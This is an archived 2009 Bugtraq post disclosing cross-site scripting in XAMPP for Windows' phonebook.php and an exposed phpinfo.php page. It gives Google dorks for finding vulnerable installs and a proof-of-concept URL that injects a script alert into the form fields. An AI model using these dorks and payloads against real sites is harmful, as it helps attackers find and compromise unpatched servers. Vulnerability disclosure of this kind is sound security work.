XAMPP for Windows (Xss/PHPinfo) Multiple Vulnerability

From: Cru3l.b0y <cru3l.b0y@gmail.com>
To: bugtraq@securityfocus.com
Cc:
Subject: XAMPP for Windows (Xss/PHPinfo) Multiple Vulnerability
Date:

Attachments:
XAMPP for Windows (XssPHPinfo) Multiple Vulnerability.txt

Hi Dear,
I found new bug.please publish it.exploit attached to mail.
Best Regards.

# XAMPP for Windows (Xss/PHPinfo) Multiple Vulnerability                            
# AUTHOR  : Cru3l.b0y
# DATE    : 05 APR 2009
# SITE    : WwW.DeltaHacking.Net
# CONTACT : Cru3l.b0y@deltahacking.net

#####################################################

# APPLICATION  : XAMPP for Windows
# VERSION      : 1.4.9 , 1.5.0 , 1.5.1 , 1.6.4
# DOWNLO       : http://www.apachefriends.org/en/xampp-windows.html
# VENDOR       : http://www.apachefriends.org/

#####################################################
            
[+] Xss:

             Dork    : inurl:"/xampp/phonebook.php"
                       Exploit : 
                              Vulnerability is in phonebook. First go to site.com/xampp/phonebook.php
                       now write your script in First name or Phone number box and press ADD. Your script will run successfully.
             
                       http://127.0.0.1/xampp/phonebook.php?lastname=Cru3l.b0y&firstname=<script>alert(123);</script>&phone=<script>alert(123);</script>
            

[+] PHPinfo:
 
             Dork    : inurl:"/xampp/phpinfo.php"
                  Exploit : http://127.0.0.1/xampp/phpinfo.php
##############################################################################################
# Greeting: Dr.Trojan, Sasha, b3hz4d, PLATEN, black.viper and all member in DeltaHacking.Net #
##############################################################################################



Copyright © 1995-2018 LinuxRocket.net. All rights reserved.